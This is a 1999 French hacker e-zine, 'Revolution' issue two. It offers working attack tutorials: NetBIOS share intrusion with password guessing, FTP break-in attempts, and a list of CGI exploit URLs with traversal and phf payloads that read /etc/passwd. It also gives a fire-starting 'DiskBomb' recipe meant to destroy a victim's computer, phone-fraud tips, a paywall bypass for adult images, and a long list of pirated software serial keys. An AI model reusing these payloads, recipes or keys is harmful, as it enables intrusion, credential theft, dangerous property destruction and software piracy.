     
  °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
 
   ######    ######  #      #    #####   #        #     #  #######  #######   #####   ##     #  
   #     #  #        #      #   #     #  #        #     #     #        #     #     #  # #    #  
   #     #  #         #    #    #     #  #        #     #     #        #     #     #  #  #   #  
   ######    ###      #    #    #     #  #        #     #     #        #     #     #  #   #  #  
   #   #    #          #  #     #     #  #        #     #     #        #     #     #  #    # #  
   #    #   #          #  #     #     #  #        #     #     #        #     #     #  #     ##  
   #     #   ######     ##       #####   #######   #####      #     #######   #####   #      #  

  °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°        
          COMETE NUMBER TWO                                               NOVEMBRE 1999


			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                        Edité par Redoxx 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤            
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                            E d i t o 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	REDOXX EST DE RETOUR !!!

	Et oui, deux mois après la première comète, vous avez devant vos grands yeux ébahis et 
votre grande bouche ouverte le second astéroïde de la saga REVOLUTION !!!	

	J'ai pas changé, et je reste dans toujours mon trip déliro-newbies-pas-prise-de-tête, et 
j'ai reçu pour cet astéroöde l'aide d'Angelz, alias The_Hunter, qui m'a pondu pas mal d'articles
spécialement pour vous :o)

	Sinon, j'ai supprimé la division du zine en sections, parce que ça me prenait la tête,
que c'est plus simple comme ça... Pis d'abord, je fais comme je veux, na ! ;oP

	Par contre, grâce à Angelz, vous trouverez 2 articles de serialz... Et on peut dire que
le chasse a été bonne pour The_Hunter !!! En plus : 3 articles sur les trucs de cul !!!

	Je rappelle à ceux qui l'auraient oublié ou ceux qui ne le savent pas encore que je ne me
prends pas au sérieux et tout ce que je dis est à prendre au 340e degré (quoi ? Comment ça
j'avais mis 128e dans le premier numéro ? Ben c'est pas de ma faute si je m'aggrave... Pis
laissez-moi tranquille ou j'appelle ma maman d'abord !), parce que je suis de ceux qui se 
prennent pas la tête et qui pratiquent l'auto-dérision sans se poser de question, et si vous 
êtes cons et que vous pouvez pas comprendre ça, ben c'est dommage pour vous, mais je tiens à 
vous signaler que je vous pisse à la raie avec une paille de 50 mètres de long sans toucher les 
bords :o)... Quoi ? On dirait le même texte que pour le numéro un ? Ben vous connaissez pas le
copier/coller ?!?!? Je me rippe tout seul, c'est pas beau ça ?  ;oP 

	Sinon, vous remarquerez que je me suis toujours pas décidé à mettre un disclamerde dans 
cet e-zine, parce que je suis un r34L r3b3LzZ et que avec mes pouvoirs de L0rDzZ 0f D4rKn3zZ,
ben j'ai peur de personne ! Nan, en vrai, c'est parce que mon papa est le chef de la DST et ma
maman la patronne de la DGSE, alors je risque pas grand-chose... ;oP

	Bon, allez, on va pas rester sur cet édito pendant l'éternité...

	Donc comme ils disent dans DeathlyBy... 

	GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO-GO !!!!!!!


		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


							REDOXX
 						Redoxx@caramail.com

							ANGELZ 
						Angelz@caramail.com



		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°



			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                      S o m m a i r e 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-	
							   ¤¤
		TITRE DE L'ARTICLE		   ¤¤			AUTEUR
							   ¤¤
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	Hacker une Bécane sans Troyen		   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	     Faire un DiskBomb			   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	   Hacker un Site par FTP		   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
         Les Photos de Cul DCOD              ¤¤			Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
         	Le White-Boxing                  ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
		Les Failles CGI			   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	     Serial Force One		         ¤¤			Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	      Liste de Proxies			   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
		Bière à pas Cher			   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
            Serial Force Two	   		   ¤¤			Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
      Les Vidéos de Cul Sexy Channel	   ¤¤			Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	   Faire un Fichier .BAT		   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
	     Faire une Crap-Box			   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
  Bidouillage sur Téléphones Portables 	   ¤¤	   Redoxx with help of Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
  Le Social Engineering par Snail Mail	   ¤¤			Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
 Voir tout le Contenu des Microcharme's	   ¤¤			Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
      Petite Liste d'Insultes Trash	         ¤¤		  Redoxx & Angelz
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
                  Outro	                     ¤¤		      Redoxx
 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*¤¤*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-






			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                        A r t i c l e s 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
     *** HACKER UNE BECANE SANS TROYEN ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°	


	Pour commencer, il vous faut tout d'abord vous assurer que vous avez sur votre bureau 
l'icone "Voisinage réseaux" . Si ce n'est pas le cas, vous devez l'ajouter, dans "Panneau de 
configuration". 

     	Bon, maintenant, choisissez votre cible, trouvez son IP et ouvrez une session Ms-Dos et 
tapez :

C:\WINDOWS>nbtstat -A IP_de_la_cible

      
	Voila ce qui va s'afficher : 

NetBIOS Remote Machine Name Table
Name           Type     Status
USERNAME 00   UNIQUE  Registered
WORKGROUP 00  GROUP   Registered
USERNAME 03   UNIQUE  Registered
REMOTE 20     UNIQUE  Registered
WORKGROUP 1E  GROUP   Registered
MAC Address = 44-45-53-54-00-00
C:\WINDOWS> 

      
	Il est possible qu'un message d'erreur apparaisse sous la forme d'un : "HOST NOT FOUND", 
il peut y avoir deux cause à cette erreur : 

      1°) La personne ne fait pas tourner le client MiKro$oFt ou n'est tout simplement pas sous
Windaube,... c'est donc normal, mais ça fait chier, parce que votre hack est raté ! 

      2°) Quelqu'un utilise le même nom de machine que vous et est aussi connecté, changez donc
le votre en un autre qui ne risque pas d'être pris (donc soyez original). 


      Bon, imaginons que vous ayez du premier coup une réponse favorable du Nbtstat ; ce qui 
est intéressant, c'est le service de partage de fichiers (le "Remote 20"), et s'il n'y est pas,
lâchez l'affaire car votre hack est définitivement foiré. 

      Maintenant que vous avez le nom du "Remote 20", il vous faut l'ajouter au fichier 
"Lmhosts" dans le répertoire de WiNfUcK (si ce nom contient des espaces, il faut les mettre 
entre guillemets). 

      Ce fichier est utilise par la pile du client "Wins" (qui fait que Netbios prime sur le 
TCP/IP) et contient la redirection des addresses IP vers les noms d'ordinateurs. Ce fichier est
divisé en plusieures colonnes :

- la premiere contient l'adresse IP
- la seconde le nom de la machine hôte
- la troisième et les suivantes des commentaires et/ou des directives 

      Ce qui différencie le passage d'une colonne à une autre, c'est, au mimimum, un espacement.

      Chaque directive et chaque commentaire doivent être précédé du signe #, mais ils ne 
servent a rien pour l'instant. 

      Donc, sous la session Ms-Dos que vous avez ouvert, tapez :

C:\WINDOWS>echo IP REMOTE 20>>C:\windows\lmhosts 

      
	Ici, il n'y a aucun fichier Lmhosts existant, donc remplacez la redirection >> par >. 

      Une fois le nouveau host ajouté, il ne vous reste plus qu'à reseter le cache du Netbios. 

      Donc dans votre session Ms-Dos, tapez :

C:\WINDOWS>nbtstat -R 

      
	Et vous aurez :

Successful purge and preload of the NBT Remote Cache Name Table.
C:\WINDOWS> 

      
	Maintenant, il faut savoir quelles sont les ressources qui sont partagées sur la machine
hôte, donc on va se servir de la commande "NET", dont le paramètre "View" permet de lister ces
ressources. 

      Donc tapez dans votre session Ms-Dos :

C:\WINDOWS>net view \\NOM_du_REMOTE_20 

      
	Et si tout se passe bien, vous obtiendrez :

Shared resources at \\USERNAME
Sharename Type Comment
A Disk
C Disk
D Disk
HPDeskJet Printer
The command was completed successfully.
C:\WINDOWS> 

      
	Il est possible que des messages d'erreur s'affichent ; voici les plus courant, et 
comment en venir à bout :


Error 5: You do not currently have access to this file. 

      La machine partage bel et bien certaines ressources mais vous devez entrer un password 
pour y avoir accès. Pour cela il faut passer par Windaube : cliquez sur "Démarrer", allez dans 
"Rechercher" puis dans "Ordinateur". Nommez l'ordinateur "\\Remote20" et cliquez sur "Rechercher
maintenant" ; une fois que la bécane est trouvée, cliquez deux fois dessus et vous pourrez 
alors entrer un password-réseau (essayez un password vide ou le nom du Remote20, et si ça marche
pas, démerdez-vous :-P).


Error 53: The computer name specified in the network path cannot be located. 

      Là, il peut y avoir deux causes à l'erreur : soit vous avez mal introduit des données, 
soit la machine que vous essayez d'atteindre n'est pas accessible (déconnexion).


Error 59: An unexpected network error has occurred. (Disconnected) 

      Ici, l'erreur et due à un problème lors de la transmission des données entre vous et la 
machine pendant l'exécution de la commande "Net View", donc recommencez.


Error 86: The specified network password is not correct. 

      Le password que vous venez d'entrer (via le DOS), n'est pas valide, donc essayez-en un 
autre. 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	      *** FAIRE UN DISKBOMB ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


     	Attention ! Ce que je décris ci-dessous n'est pas une connerie qui sort de mon 
imagination, mais bel et bien une "recette" testée et approuvée par des milliers de petits 
anarchistes en herbe, dont moi.

	Alors si vous voulez vraiment fabriquer un DiskBomb et l'utiliser, ben oubliez que vous 
avez lu ça dans mon zine, parce que je crois bien qu'on pourrait vous accuser de destruction de
matériel volontaire avec intention de nuire à la société et patati et patata...

	Pis d'façon, si vous faîtes ça que vous vous faîtes pécho, ben ce sera pas de ma faute,
parce que c'est Nucke (un gars de De-Generation-X) qui m'a appris ça !


*** Matériel ***


- Une disquette (pourrave tant qu'à faire)
- Du vernis à ongles ou de la colle en pot (la colle crade qu'on met avec une pastule)
- Du souffre (grattez le bout des allumettes si vous n'en trouvez pas)
- De la laque ou du déodorant (facultatif, c'est moi qui ait pensé à ça)


*** Procédure ***


      Ouvrez la disquette en faisant bien attention à ne pas casser le plastique et ouvrez les
deux bouts de coton de chaque côté du disque.

      Enduisez les deux côtés (un seul suffit, mais deux, c'est plus efficace) du disque avec
une bonne couche de vernis ou de colle, et recouvrez les de souffre (moi, c'est comme ça qu'on
m'a appris, mais après mûre réflexion, je me suis dit qu'il n'y avait besoin de recouvrir
qu'une languette : la surface qui ne sera pas protégée par le plastique ensuite).

      Remettez les deux bouts de plastique sur le disque (la colle ou le vernis fera office
d'agent collant) en faisant bien attention à ce que votre recollage ressemble encore à une
disquette.

      Vaporisez de la laque sur le plastique du DiskBomb.

      Mettez la disquette dans un ordinateur, allumez-le, et partez vite !

      Existe aussi la variante d'allumer l'ordi, mettre la disquette dans le lecteur et
attendre qu'un petit curieux ou une petite curieuse veuille regarder ce qu'il y a dessus.


*** Pourquoi ça marche ? ***


      Ben c'est bien simple, dans le lecteur-disquette, il y a quelques étincelles quand l'ordi
s'allume et vérifie si le lecteur est vide ou quand on veut regarder sur une disquette, la tête
de lecture frotte le disque ; le souffre va alors prendre feu (c'est le principe de l'allumette,
pour le neu-neu qu'aurait pas compris ;-P), et la laque (ou le déodorant) étant très 
inflammable, ça va prendre fau aussi, et tout le lecteur-disquette va crâmer, puis ce feu de
joie va se répandre dans l'unité centrale... Et boum ! Plus d'ordinateur ! 





	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** HACKER UN SITE PAR FTP ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** Qu'est-ce qu'un FTP ? ***

      FTP signifie File Transfert Protocol, ce qui signifie que c'est un protocole qui permet 
de transmettre des fichiers d'un ordinateur à un autre (par exemple, quand on télécharge un 
programme, ça passe par le FTP). Les ports qui lui sont attribués sont les ports 20 et 21. 


*** Comment hacker en passant par le FTP ? ***

      Allez dans Ms-Dos et tapez :

ftp
open www.nomdusite
quote user ftp
quote cwd ~root
quote pass ftp

      En fait, on obtient un truc dans ce style (avec une * devant ce qu'il faut taper, avec ¤ 
devant ce qu'on obtient) :

* Ftp> open www.cible.com

¤ connected to www.cible.com
¤ 220 websrv1 microsoft ftp service(version 4.0)

* Ftp> quote user ftp

¤ 331 anonymous acces allowed, send identify (e-mail name)as password

* Ftp> quote cwd ~root

¤ 530 please login with user and pass

* Ftp> quote pass ftp

¤ 230 anonymous user logged in

      Voila ! Si tout se passe bien, on est alors connecté sur le site-cible. 

      Si le serveur est securisé, on obtient un truc comme ça (mais lâchez l'affaire, vous 
aurez vraiment beaucoup de mal à réussir sauf si vous avez une connection par cable et un bon 
crackpass) :

* Ftp> open www.cible.com
¤ connected to www.cible.com
¤ websrv microsoft ftp service (version 4.0)
* Ftp> quote user ftp
¤ 331 password required for ftp
* Ftp> quote cwd ~root
¤ 530 please login with user and pass
* Ftp> quote pass ftp
¤ 530 user cannot log in

      Une fois connecté sur le site, vous pouvez utiliser les commandes suivantes : 

PWD : montre où l'on se situe sur le disque

DIR : montre le contenu de la racine

MKDIR : créé un répertoire (ex : "mkdir suxx" créé le repertoire "suxx")

RMDIR : supprime un répertoire (ex : "rmdir suxx" supprime le répertoir "suxx")

DEL : supprime un fichier (ex : "del suxx.exe" supprime le fichier "suxx.exe")

CD : emmène dans un répertoir (ex : "cd suxx" emmène dans le répertoir "suxx")

CD / : rammène à la racine

CD.. : rammène au répertoir précédant

GET : prend un fichier et le met sur votre bureau

      
	Quand vous avez fini de faire joujou, tapez "quit" et vous serez déconnecté. 

      Voila ! C'est pas bien sorcier quand même !!! 





	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	   *** LES PHOTOS DE CUL DCOD ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Vous connaissez sans aucun doute ces fameux dossier CHARME que l'on trouve dans GEN4, 
Micro Dingo,etc... 3615 DCOD ( attrape lamerz :))

	On essaie toujours de pouvoir les voirs sans payer. On essaie de changer l'extansion en 
JPG, GIF ou BMP, mais ca fonctionne très rarement...

	Pourquoi ?

	Ben c que les progs on cryptés les photos ( style : DEFONCE.xxx ), ce dossier DEFONCE.xxx
regroupe 5 images en 1 fichier, donc c pas la peine de ce prendre le tete sur l'extansion, car 
c fichu d'avance, alors quoi faire ??????

	Ben, je connais pas le moyen de voir tout le contenu du CD, mais par contre je sais voir
le bonus sans passer par le minitel ( si qlq'un sais pour toutes les photos !!!!).

	Tout d'abord, il faut un CD ou y'a le fameux dossier ( ben ca c normal... )

	Ensuite, faut copier ce dossier sur votre disque dur...

	Puis, vous ouvrez une fenetre DOS sous Zindoz.9x    OK ?

	Bon, tapez ce qui suit sous DOS ( l'explication est après ! ) :

	*:\=> CECI EST UN COMMENTAIRE 



						DEBUT  DOS


Micro$oft(R) Zindozs 9x

C:\WINDOWS>cd..

<ENTRER>

C:\>cd DCOD                       *:\=> après le (cd) mettre la destination ou vous avez mis le
                                        le dossier DCOD sur votre DD.

<ENTRER>


C:\DCOD>cd images

<ENTRER>

C:\DCOD\IMAGES>ren *.iba *.ica

<ENTRER>

C:\DCOD\IMAGES>cd..

<ENTRER>

C:\DCOD>cd album

<ENTRER>

C:\DCOD\ALBUM>ren *.iba *.ica

<ENTRER>


                                         FIN DOS




	Donc, alors un petit peu d'explication pour celui qui veut comprendre :

	Le but de ce listing, était de changer d'extension ( *.iba en *.ica ), mais seulement en
mémoire ( pas directement ! ).

	Ben, normalement, si vous ouvrez le dossier DCOD ( ou charme, ca depends ! ), vous 
devriez pouvoir voir en clair, une dizaine de photos hard, qui sont en fait le bonus pour les 
personnes qui ont payés un ou des codes par minitel...

	J'ai aussi essayé avec le reste des photos ( les *.xxx ) mais ca marche poa :(  

	Ca dois etre une autre extansion que *.ica...

   	ALORS HELP-ME POUR LE RESTE !!!!! 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	       *** LE WHITE-BOXING ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


*** C'est quoi le White Boxing ? ***

      A peu de choses près, le White Boxing consiste à émettre un son dans le combiné afin que 
la cabine n'affiche pas les numéros composés. 


*** Comment faut-il procéder ? ***

      Bon, ben ça, c'est assez difficile à décrire, parce qu'à moins d'avoir une machine qui 
émet le "Ssssssscccccccchhhhhhhhhhh" du White Boxing, il faut s'entraîner à le produire avec 
sa bouche.

      Faut pas s'inquiéter, c'est pas difficile : c'est comme quand on fait signe à quelqu'un 
de se taire en mettant un doigt sur la bouche et en émettant un "Chut" très bref, sauf que là,
le son doit être plus long et plus fort.

      Sinon, si vous avez un dictaphone de bonne qualité, et si votre modem n'est pas intégré à
votre ordi, vous pouvez enregister le son qui suit la numération et le mettre en lecture devant
le combiné. 






	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	       *** LES FAILLES CGI ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


     Utiliser les failles CGI est la technique la plus simple pour obtenir un fichier mot de 
passe, mais elle ne marche plus dans 99 % des cas, parce que les admins, moins cons qu'on ne 
pourrait croire (mais bien attaqués quand même :-P) ont installés une protection contre ce 
genre d'attaque.

     Bon, alors c'est très simple, il suffit de taper ce qui suit dans la barre de votre 
navigateur (liste non-exhausive) : 

	http://url_du_site/cgi-bin/anyform.cgi
	http://url_du_site/cgi-bin/aglimpse
	http://url_du_site/cgi-bin/bnbform.cgi
	http://url_du_site/cgi-bin/campas
	http://url_du_site/cgi-bin/carbo
	http://url_du_site/cgi-bin/cgimail 
	http://url_du_site/cgi-bin/classifieds.cgi
	http://url_du_site/cgi-bin/count.cgi
	http://url_du_site/cgi-bin/dumpenv.pl
	http://url_du_site/cgi-bin/environ.cgi
	http://url_du_site/cgi-bin/file.pl
	http://url_du_site/cgi-bin/faxsurvey.cgi
	http://url_du_site/cgi-bin/formail
	http://url_du_site/cgi-bin/guestbook
	http://url_du_site/cgi-bin/handler
	http://url_du_site/cgi-bin/httpd
	http://url_du_site/cgi-bin/htmlscript
	http://url_du_site/cgi-bin/info2www
	http://url_du_site/cgi-bin/nph-test.cgi
	http://url_du_site/cgi-bin/nph-publish
	http://url_du_site/cgi-bin/perl.exe
	http://url_du_site/cgi-bin/pfdispaly.cgi
	http://url_du_site/cgi-bin/php
	http://url_du_site/cgi-bin/phf
	http://url_du_site/cgi-bin/Quid Pro Quo
	http://url_du_site/cgi-bin/s97_cgi
	http://url_du_site/cgi-bin/survey.cgi
	http://url_du_site/cgi-bin/start
	http://url_du_site/cgi-bin/textcounter
	http://url_du_site/cgi-bin/uploader.exe
	http://url_du_site/cgi-bin/view-source
	http://url_du_site/cgi-bin/webdist
	http://url_du_site/cgi-bin/webgais 
	http://url_du_site/cgi-bin/websendmail
	http://url_du_site/cgi-bin/websites
	http://url_du_site/cgi-bin/webstart
	http://url_du_site/cgi-bin/whois_raw.cgi
	http://url_du_site/cgi-bin/wwwboard
	http://url_du_site/cgi-bin/www-msql 
	http://url_du_site/cgi-bin/wguest.exe?template=3dc:\boot.ini
	http://url_du_site/cgi-bin/rguest.exe?template=3dc:\winnt\system32\$winnt$.inf
	http://url_du_site/cgi-bin/htmlscript?../../../../etc/passwd
	http://url_du_site/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd


     Juste pour les neuneux : il faut remplacer "url_du_site" par le nom de domaine de celle que
vous voulez pirater.

	Par exemple, si vous essayer de pirater Dromadaire, vous devez taper (par exemple) :

	http://www.dromadaire.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

     	Si ça ne marche pas (ce qui sera souvent le cas) il vous faudra enregistrer le fichier et
le décrypter avec un décodeur de passwords UNIX, dans le genre de MacCrac ou CrackerJack (voir
article plus bas pour voir comment trouver un password sur UNIX). 





	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
     		*** SERIAL FORCE ONE ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


     SALUT A VOUS ! Pourquoi un nom pareil (Je parle de The_Hunter, mon premier nick, pas de 
Angelz, qui est mon nouveau nom de star ;p ).... Ben, parcque ca le fait et aussi que je suis un 
chasseur et que le gibier c'est des serialz à gogo !!!! 

	Bon on y va, je vous ai fait à bouffer et c qui qui vas pas être content ???

	C'est Billouz !!!
             


                                       LE  MENU DU CHASSEUR
                                       --------------------

                  EN ENTREE :         des serialz avec un petit peu de serialz dessus.
                  ~~~~~~~~~~  

                  EN PLAT PRINCIPAL : une fricassée de code et de cd key.
                  ~~~~~~~~~~~~~~~~~~

                  EN SALADE :         des numéros de série bien vert à la vinaigrette.
                  ~~~~~~~~~~

                  EN DESSERT :        LA SURPRISE DU CHASSEUR << des profiteurs-lol à la sauce
                  ~~~~~~~~~~~         Billou >>
    



                                             ____________________________
                                            |                            |
	                                      |    PWE500R7205041-005-808  |
	                                      |    PWS500R7205353-312      |
ADOBE PHOTOSHOP  5.0 pour Zindoz  95/NT :---|    EXX500R7042200-980      |
	                                      |    PWE500X7205119-408      |
	                                      |    PWE500X7205050-732      |
                                            |____________________________|


                                                ____________________
                                               | ABW800X7102095-685 |
ADOBE ILLUSTRATOR 8.0 :------------------------| ABW800R7119160-874 |
	                                         | ABW700X7102095-731 |
                                               |____________________|

                                                ___________________________
ADOBE IMAGE READY 1.0:-------------------------| EXM100XX675071598-005-414 |
	                                         | DHE100X799999999-441      |
                                               |___________________________|


ACDSee Notes +v2.x: Name: Finn Mac CooL   Company: Fee Free Warez   Serial: 4399225955

BOOGIE BABY SCREENSAVER 3.6.0.0: Password: WdM367 

BILLIONAIRE 2.6: Name: escom/CORE   Reg: rm-68719476736

CAMERAMAN 2.0: CMSV0336
                                 ________________
                        	  | 1287-6097-3288 |
CATZ (tamagotchi sur PC)--------| 1287-5759-7505 |
	                          | 5501-8984-3486 |
	                          | 5467-2039-9862 |
                                |________________|

CD COPY 1.0: C.012169

CDEdit  1.0: User Name: Spider]PC98   Reg Code: 87675692495

CDR Win 3.1c: Name: Hackerjack!   Company: PHRoZeN CReW              Serial: 413236786
              Name: Prizna        Company: Plate Steel Productions   Serial: 1180236277

CDR-WIN 3.3a:  Username: Val Petru	Company/Email: megadoc@usa.net
	         Unlock Key (DOS): 85ebc3a5-c85ce953-e49ff048-f4de3f7d
	         Check Key (DOS): 7135fcd8-4db72af6-2cc3191b-1041cf35
	         Unlock Key (Win): cc3f7ae2-45ff6b16-c428c6dd-c24bd933
	         Check Key (Win): 0e74a3d1-89c011f4-81d7adcb-06631fee
                __________________________________________________
               | Username: CDRWin   Company: Golden Hawk          |
	       __| Unlock code: A4B0C14F-1094B183-1D6A1418-10851E01 |
	      /  | Check code: B435DF4E-B42470CC-0DFEA59B-0DEF0A19  | 
           /   |__________________________________________________|
CDRWin 3.5:     __________________________________________________
           \   | Username: CDRWin   Company: Golden Hawk          | 
	      \__| Unlock code: A4B0F27C-1094B183-1F6A141A-10851E01 |
	         | Check code: B435EC7D-B42443FF-0FFEA599-0FEF0A1B  |
               |__________________________________________________|

CGI*StarDuo95 1.03: AA3852-AA912-45AAA-12345-7896385

Chat with Lisa: bbs: Registered BBS  First name: Registered  Last name: Sysop  
                                            s/n: 456600268275

Chili Pepper S/W Infinate Disk Advanced: CP913BC123388
                        _____________________________________
                       | 1\15:90.99014:2756968448A45421:N/0  |
CINEPAK TOOLKIT:-------| 1\15:90.99014:2558263296987C21:N/0  |
                       |_____________________________________|

ClarisWorks 4.0 pour Zindoz 95: 011-245578-112
                       _______________________________________
                      |  Name: Riz la+                        |
CODEDIGGER 2.0+:------|  Code: X91R1E330A (for Use up to 2.0) |
	                |  Code: 2CZCPQJ3B9 (for Use up to 3.0) |
                      |_______________________________________|

CODEDIGGER 2.1: name: FANATIC'98   reg#: H3941SVQE6
                ________________________________________________
               | Name: George Jetson	      Code: TLHNLGEW  |
	         | Name: NosyFred	            Code: FRJRMJRD  |
	         | Name: Steve Hsu	            Code: NJIRSMOP  |
	         | Name: tHATDUDE PC96	      Code: HFCMGACK  |
COOL EDIT 96:--| Name: tHATDUDE PC97	      Code: GGRGEGSI  | 
	         | Name: PhRoZeN CReW 97	      Code: SIYVBHZE  | 
